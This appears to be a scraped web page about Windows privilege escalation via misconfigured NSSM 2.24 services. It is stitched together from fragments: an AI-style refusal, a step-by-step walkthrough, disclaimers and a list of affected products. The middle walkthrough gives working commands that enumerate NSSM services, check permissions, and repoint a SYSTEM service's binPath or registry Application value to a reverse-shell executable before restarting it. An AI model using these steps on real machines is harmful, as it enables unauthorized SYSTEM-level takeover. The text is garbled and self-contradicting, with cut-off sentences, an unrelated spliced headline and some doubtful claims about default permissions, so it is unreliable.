I’m unable to provide a full exploit or walkthrough for a privilege escalation vulnerability in NSSM 2.24, as that could be used maliciously. However, I can share general, educational information about why such vulnerabilities historically existed in older versions of NSSM (Non-Sucking Service Manager).
Known issue pattern (historical):
In NSSM versions prior to 2.24 (and sometimes including 2.24 depending on configuration), a privilege escalation was possible if:
nssm edit <service>) allows modification of service configuration without proper access control checks, enabling a user with SERVICE_CHANGE_CONFIG permission to change the binary path to a malicious executable.Secure alternatives for modern systems:
New-Service with proper SDDL.WinSW or native Windows services).%ProgramFiles% or %SystemRoot%, not user-writable directories.SERVICE_CHANGE_CONFIG only for admins via service DACL.If you’re a security researcher testing NSSM 2.24 in a lab, review:
Would you like a non-exploit explanation of how to detect weak NSSM service configurations instead?
Published: For educational and defensive security purposes. Always obtain permission before testing on any system you do not own.
Non-Sucking Service Manager (NSSM) version 2.24 does not have a unique, built-in "exploit" or CVE inherent to its code. Instead, privilege escalation involving NSSM almost always stems from insecure deployment configurations
. Because NSSM is an executable used to wrap other applications as services, it is a high-value target for attackers who have already gained a foothold on a system. Primary Escalation Vectors
When NSSM 2.24 is present, it is usually targeted via three common Windows service misconfigurations: Head Mare and Twelve: Joint attacks on Russian entities nssm-2.24 privilege escalation
NSSM 2.24 does not enforce a restrictive DACL (Discretionary Access Control List) on created services. Instead, it relies on Windows defaults, which may allow SERVICE_CHANGE_CONFIG to non-admin users when the service is created during an administrative session but without explicit security hardening.
Assume:
MyNSSMService runs as SYSTEM.Step 1 – Identify NSSM services
sc query state= all | findstr /i "SERVICE_NAME"
sc qc MyNSSMService | findstr /i "BINARY_PATH_NAME"
Look for nssm.exe in the path or the Parameters\Application registry key.
Step 2 – Check your permissions
accesschk.exe -accepteula -uvwqk "HKLM\SYSTEM\CurrentControlSet\Services\MyNSSMService"
Or simpler: try to change the binary path.
Step 3 – Modify the service to run your payload
sc config MyNSSMService binPath= "cmd.exe /c C:\temp\reverse_shell.exe"
Or via registry (if direct sc fails):
reg add "HKLM\SYSTEM\CurrentControlSet\Services\MyNSSMService\Parameters" /v Application /t REG_SZ /d "C:\temp\evil.exe" /f
Step 4 – Restart the service
net stop MyNSSMService
net start MyNSSMService
Your payload runs as SYSTEM. Game over.
When NSSM installs a service using the command:
nssm install <ServiceName> <path-to-executable>
It creates a service with the following security descriptor (by default):
SERVICE_START, SERVICE_STOP, SERVICE_QUERY_CONFIG, and SERVICE_CHANGE_CONFIG to the Everyone or Authenticated Users group, depending on Windows version and NSSM build flags.This allows an unprivileged user to:
binPath to point to a malicious executable.SYSTEM.Modern service managers include safeguards against arbitrary binary replacement and insecure service configuration modification. NSSM 2.24, however, was designed for convenience—not security. Its core features that enable privilege escalation include:
HKLM\SYSTEM\CurrentControlSet\Services\<ServiceName>\Parameters, but older versions fail to enforce strict permissions.NSSM is convenient but dangerous if misconfigured. Always assume that a service running as SYSTEM with writable configuration is a local privilege escalation vector. Audit your endpoints, and don’t let convenience override security.
Disclaimer: This post is for educational and defensive purposes only. Unauthorized access to systems is illegal. I’m unable to provide a full exploit or
While NSSM 2.24 is a legitimate tool used to manage Windows services, it is often central to privilege escalation attacks due to improper deployment permissions rather than a flaw in its own source code.
When NSSM is bundled with third-party installers, it frequently inherits weak folder or file permissions, allowing low-privileged users to replace the nssm.exe binary or its managed application with malicious code. Key Attack Vectors
Improper File Permissions: Many applications (e.g., Wowza Streaming Engine, Apache CouchDB, Phoenix Contact) have been found to install NSSM with "Full Control" for the "Everyone" or "Users" group. Attackers can swap the binary with a malicious executable, which then runs with SYSTEM privileges upon the next service restart.
Unquoted Service Paths: If the service path to NSSM contains spaces and is not enclosed in quotes, Windows may attempt to execute files at different points in the path. For example, if installed in C:\Program Files (x86)\App Name\nssm.exe, an attacker with write access to C:\ could place a malicious file at C:\Program.exe to gain elevated access.
Weak Registry Permissions: If the registry keys governing the NSSM service (e.g., ImagePath) are writable by unprivileged users, they can modify the service configuration to execute arbitrary payloads. Known Affected Products (Examples)
Wowza Streaming Engine 4.5.0: Vulnerable via replacing the nssm_x64.exe binary due to improper permissions.
Apache CouchDB 2.0.0: Vulnerable because files inherited parent directory permissions, allowing the substitution of nssm.exe.
Phoenix Contact Device & Update Management: Misconfigured permissions on nssm.exe allowed local privilege escalation. Mitigation and Defense A service installed with NSSM runs under a
Windows Privilege Escalation — Part 1 (Unquoted Service Path)
HKLM\SYSTEM\CurrentControlSet\Services\<NSSM_Service>\Parameters\Application.